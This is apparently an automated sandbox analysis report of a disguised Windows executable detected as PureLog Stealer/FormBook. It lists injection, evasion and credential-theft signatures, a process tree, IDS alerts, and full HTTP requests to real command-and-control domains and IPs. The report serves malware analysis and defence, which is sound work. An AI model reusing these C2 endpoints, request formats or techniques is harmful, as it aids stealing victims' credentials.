Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO1268931024 - Bank Slip.exe

Overview

General Information

Sample name:PO1268931024 - Bank Slip.exe
Analysis ID:1539142
MD5:1fcde6f41117bdc978a69990608ecc69
SHA1:e8724b7ed145e838303d0b1bb393c8f3545ad567
SHA256:ee843bcf3bcd091101e9d641670be54dd9c3a2733ad3e248c29eb7e2a667c1d4
Tags:exeFormbookuser-lowmal3
Infos:

Detection

PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: Suspicious Creation with Colorcpl
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PO1268931024 - Bank Slip.exe (PID: 6240 cmdline: "C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe" MD5: 1FCDE6F41117BDC978A69990608ECC69)
    • PO1268931024 - Bank Slip.exe (PID: 5808 cmdline: "C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe" MD5: 1FCDE6F41117BDC978A69990608ECC69)
      • eiVHpMoiongmS.exe (PID: 5796 cmdline: "C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • colorcpl.exe (PID: 2588 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
          • firefox.exe (PID: 2564 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.1781279015.0000000005930000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000000.00000002.1770346968.0000000004139000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      Process Memory Space: PO1268931024 - Bank Slip.exe PID: 6240JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        SourceRuleDescriptionAuthorStrings
        0.2.PO1268931024 - Bank Slip.exe.414e790.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          0.2.PO1268931024 - Bank Slip.exe.5930000.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.PO1268931024 - Bank Slip.exe.5930000.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.PO1268931024 - Bank Slip.exe.414e790.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                System Summary

                barindex
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 2588, TargetFilename: C:\Users\user
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-22T09:04:43.729668+020028554651A Network Trojan was detected192.168.2.4497413.33.130.19080TCP
                2024-10-22T09:05:07.345040+020028554651A Network Trojan was detected192.168.2.449771141.193.213.1080TCP
                2024-10-22T09:05:21.053266+020028554651A Network Trojan was detected192.168.2.4498468.210.3.9980TCP
                2024-10-22T09:05:34.718238+020028554651A Network Trojan was detected192.168.2.449925162.0.215.24480TCP
                2024-10-22T09:05:48.203740+020028554651A Network Trojan was detected192.168.2.449997162.0.231.20380TCP
                2024-10-22T09:06:02.209670+020028554651A Network Trojan was detected192.168.2.450027103.71.154.1280TCP
                2024-10-22T09:06:22.737616+020028554651A Network Trojan was detected192.168.2.4500313.33.130.19080TCP
                2024-10-22T09:06:36.063840+020028554651A Network Trojan was detected192.168.2.4500353.33.130.19080TCP
                2024-10-22T09:06:49.440440+020028554651A Network Trojan was detected192.168.2.450039199.59.243.22780TCP
                2024-10-22T09:07:03.044507+020028554651A Network Trojan was detected192.168.2.45004313.248.169.4880TCP
                2024-10-22T09:07:17.153961+020028554651A Network Trojan was detected192.168.2.45004738.88.82.5680TCP
                2024-10-22T09:07:31.444169+020028554651A Network Trojan was detected192.168.2.4500513.33.130.19080TCP
                2024-10-22T09:07:45.006622+020028554651A Network Trojan was detected192.168.2.450055178.79.184.19680TCP
                2024-10-22T09:07:58.721216+020028554651A Network Trojan was detected192.168.2.45005984.32.84.3280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-22T09:04:59.705684+020028554641A Network Trojan was detected192.168.2.449742141.193.213.1080TCP
                2024-10-22T09:05:02.264534+020028554641A Network Trojan was detected192.168.2.449745141.193.213.1080TCP
                2024-10-22T09:05:04.799928+020028554641A Network Trojan was detected192.168.2.449756141.193.213.1080TCP
                2024-10-22T09:05:13.412511+020028554641A Network Trojan was detected192.168.2.4498038.210.3.9980TCP
                2024-10-22T09:05:15.959389+020028554641A Network Trojan was detected192.168.2.4498198.210.3.9980TCP
                2024-10-22T09:05:18.490658+020028554641A Network Trojan was detected192.168.2.4498338.210.3.9980TCP
                2024-10-22T09:05:27.248638+020028554641A Network Trojan was detected192.168.2.449882162.0.215.24480TCP
                2024-10-22T09:05:29.601890+020028554641A Network Trojan was detected192.168.2.449898162.0.215.24480TCP
                2024-10-22T09:05:32.175115+020028554641A Network Trojan was detected192.168.2.449909162.0.215.24480TCP
                2024-10-22T09:05:40.537782+020028554641A Network Trojan was detected192.168.2.449956162.0.231.20380TCP
                2024-10-22T09:05:43.070431+020028554641A Network Trojan was detected192.168.2.449972162.0.231.20380TCP
                2024-10-22T09:05:45.873181+020028554641A Network Trojan was detected192.168.2.449987162.0.231.20380TCP
                2024-10-22T09:05:54.350123+020028554641A Network Trojan was detected192.168.2.450023103.71.154.1280TCP
                2024-10-22T09:05:56.912642+020028554641A Network Trojan was detected192.168.2.450025103.71.154.1280TCP
                2024-10-22T09:05:59.459609+020028554641A Network Trojan was detected192.168.2.450026103.71.154.1280TCP
                2024-10-22T09:06:08.017467+020028554641A Network Trojan was detected192.168.2.4500283.33.130.19080TCP
                2024-10-22T09:06:10.565534+020028554641A Network Trojan was detected192.168.2.4500293.33.130.19080TCP
                2024-10-22T09:06:13.096862+020028554641A Network Trojan was detected192.168.2.4500303.33.130.19080TCP
                2024-10-22T09:06:29.303442+020028554641A Network Trojan was detected192.168.2.4500323.33.130.19080TCP
                2024-10-22T09:06:31.850424+020028554641A Network Trojan was detected192.168.2.4500333.33.130.19080TCP
                2024-10-22T09:06:34.397177+020028554641A Network Trojan was detected192.168.2.4500343.33.130.19080TCP
                2024-10-22T09:06:41.819332+020028554641A Network Trojan was detected192.168.2.450036199.59.243.22780TCP
                2024-10-22T09:06:44.330414+020028554641A Network Trojan was detected192.168.2.450037199.59.243.22780TCP
                2024-10-22T09:06:46.889813+020028554641A Network Trojan was detected192.168.2.450038199.59.243.22780TCP
                2024-10-22T09:06:55.179364+020028554641A Network Trojan was detected192.168.2.45004013.248.169.4880TCP
                2024-10-22T09:06:57.744337+020028554641A Network Trojan was detected192.168.2.45004113.248.169.4880TCP
                2024-10-22T09:07:00.395619+020028554641A Network Trojan was detected192.168.2.45004213.248.169.4880TCP
                2024-10-22T09:07:09.453120+020028554641A Network Trojan was detected192.168.2.45004438.88.82.5680TCP
                2024-10-22T09:07:11.984031+020028554641A Network Trojan was detected192.168.2.45004538.88.82.5680TCP
                2024-10-22T09:07:14.566018+020028554641A Network Trojan was detected192.168.2.45004638.88.82.5680TCP
                2024-10-22T09:07:22.881536+020028554641A Network Trojan was detected192.168.2.4500483.33.130.19080TCP
                2024-10-22T09:07:25.434010+020028554641A Network Trojan was detected192.168.2.4500493.33.130.19080TCP
                2024-10-22T09:07:27.988871+020028554641A Network Trojan was detected192.168.2.4500503.33.130.19080TCP
                2024-10-22T09:07:37.350389+020028554641A Network Trojan was detected192.168.2.450052178.79.184.19680TCP
                2024-10-22T09:07:39.913570+020028554641A Network Trojan was detected192.168.2.450053178.79.184.19680TCP
                2024-10-22T09:07:42.532922+020028554641A Network Trojan was detected192.168.2.450054178.79.184.19680TCP
                2024-10-22T09:07:50.972903+020028554641A Network Trojan was detected192.168.2.45005684.32.84.3280TCP
                2024-10-22T09:07:53.519373+020028554641A Network Trojan was detected192.168.2.45005784.32.84.3280TCP
                2024-10-22T09:07:56.160914+020028554641A Network Trojan was detected192.168.2.45005884.32.84.3280TCP
                2024-10-22T09:08:04.948879+020028554641A Network Trojan was detected192.168.2.450060188.114.96.380TCP
                2024-10-22T09:08:07.287998+020028554641A Network Trojan was detected192.168.2.450061188.114.96.380TCP
                2024-10-22T09:08:10.453723+020028554641A Network Trojan was detected192.168.2.450062188.114.96.380TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: PO1268931024 - Bank Slip.exeAvira: detected
                Source: PO1268931024 - Bank Slip.exeReversingLabs: Detection: 52%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: PO1268931024 - Bank Slip.exeJoe Sandbox ML: detected
                Source: PO1268931024 - Bank Slip.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO1268931024 - Bank Slip.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: colorcpl.pdbGCTL source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974188510.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000003.2048251287.000000000084C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: colorcpl.pdb source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974188510.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000003.2048251287.000000000084C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eiVHpMoiongmS.exe, 00000004.00000002.4157212412.00000000000FE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.1977997505.0000000005079000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.1976076736.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO1268931024 - Bank Slip.exe, PO1268931024 - Bank Slip.exe, 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000007.00000003.1977997505.0000000005079000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.1976076736.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: PbnE.pdb source: PO1268931024 - Bank Slip.exe
                Source: Binary string: PbnE.pdbSHA2561 source: PO1268931024 - Bank Slip.exe
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0321C3B0 FindFirstFileW,FindNextFileW,FindClose,7_2_0321C3B0
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4x nop then pop edi4_2_06C062FC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4x nop then xor eax, eax4_2_06C0A1BD
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then xor eax, eax7_2_03209DC0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then mov ebx, 00000004h7_2_051404E0

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 141.193.213.10:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 141.193.213.10:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49771 -> 141.193.213.10:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49819 -> 8.210.3.99:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49803 -> 8.210.3.99:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49846 -> 8.210.3.99:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 141.193.213.10:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49898 -> 162.0.215.244:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49956 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49882 -> 162.0.215.244:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49997 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 38.88.82.56:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 103.71.154.12:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 103.71.154.12:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49972 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49833 -> 8.210.3.99:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50060 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50051 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50061 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49909 -> 162.0.215.244:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49987 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 38.88.82.56:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50059 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 38.88.82.56:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50043 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50055 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 103.71.154.12:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50062 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 103.71.154.12:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50039 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49925 -> 162.0.215.244:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50047 -> 38.88.82.56:80
                Source: Joe Sandbox ViewIP Address: 141.193.213.10 141.193.213.10
                Source: Joe Sandbox ViewIP Address: 141.193.213.10 141.193.213.10
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: DV-PRIMARY-ASN1US DV-PRIMARY-ASN1US
                Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /up8i/?qp=qTZ8t28&_XPD90E=FonQAt5G6G0h5a/xcW34pfv7cxcrms3RfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQdsR1nmqFV7MzuwwVkSFycHqtReIUzDRqobl4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.ladylawher.orgUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global trafficHTTP traffic detected: GET /9g6s/?_XPD90E=l/X+t9hb8CWGjOR6SGZVUSer8Zv3g1fAQ4EIxPlc4MjqsNc2fQ5FEV3oB4t5s/ThvfRNUBaEClSQ3k3rscZvXswkeLIgZt7sZdEg/e0UbdbzANigZVdYlcc=&qp=qTZ8t28 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.meanttobebroken.orgUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global trafficHTTP traffic detected: GET /li8d/?qp=qTZ8t28&_XPD90E=sm+xvlFNJ8Jn1MAgd7H5GM7xL3QFLG7nhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbr4aM8dbnuEYYtVmB+eJtacLqhBkyb5k3hgGU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.jexiz.shopUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global trafficHTTP traffic detected: GET /3lre/?_XPD90E=/6Vdp+1Y21llHWroV1g1nbD9sUc5jc+T517P2ezUMEZQpYm2I4KB95g+5G1ZwATxC5oRicPrlKz7UaUXu7WnGnVkV2kzsYh+hkLabXiWN1IrSGybLcPbfYA=&qp=qTZ8t28 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.prediksipreman.fyiUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global trafficHTTP traffic detected: GET /855d/?_XPD90E=2B0ERzH0P28lwthdevcVhvj9llT5BlecEDtAIyO4xBEaITWb1iLHHs/q7NYM0I/g8MkSYcfxzku7nIYL4eoSssJTtiqjkpOnyuaVgJz/zdISSnDhIUOFk8Y=&qp=qTZ8t28 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.givora.siteUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global trafficHTTP traffic detected: GET /jx6k/?_XPD90E=beqWGJ7SP2hkLKuIgnm7ooabSifxwbgOlVU3zrC7D+GWWG+2bEVKgJQW/9jqYGl3wiT++u8kPbwe1lvFRaGrAUgG0kgyTvD4QnbATbVShaQ+9re30AjSG1c=&qp=qTZ8t28 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.2925588.comUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global trafficHTTP traffic detected: GET /6o8s/?_XPD90E=xHDOnX+lWlIEr4hmVq7JKpd6pqyOkl158G8B7DId8TM/qnePyNRX8+3i62aVr9vdoGnKMYHj9baJVFQ0pmQfZgdz+oXBkvcBUJwvknbqZIgwAmVeRiOE+Mw=&qp=qTZ8t28 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.wrl-llc.netUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global trafficHTTP traffic detected: GET /l5ty/?_XPD90E=q+OYZAje5TGGPxruqv4Ie4uGL0FJBdVtlfgg+KmPc/5JdZ3+06LBf09NB5PeZCRMfA3Rwmt3pN3KnHXg/BNAIZom36/OATPlTemOBBCw5W17q1Y0x2snJ2U=&qp=qTZ8t28 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.7fh27o.vipUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
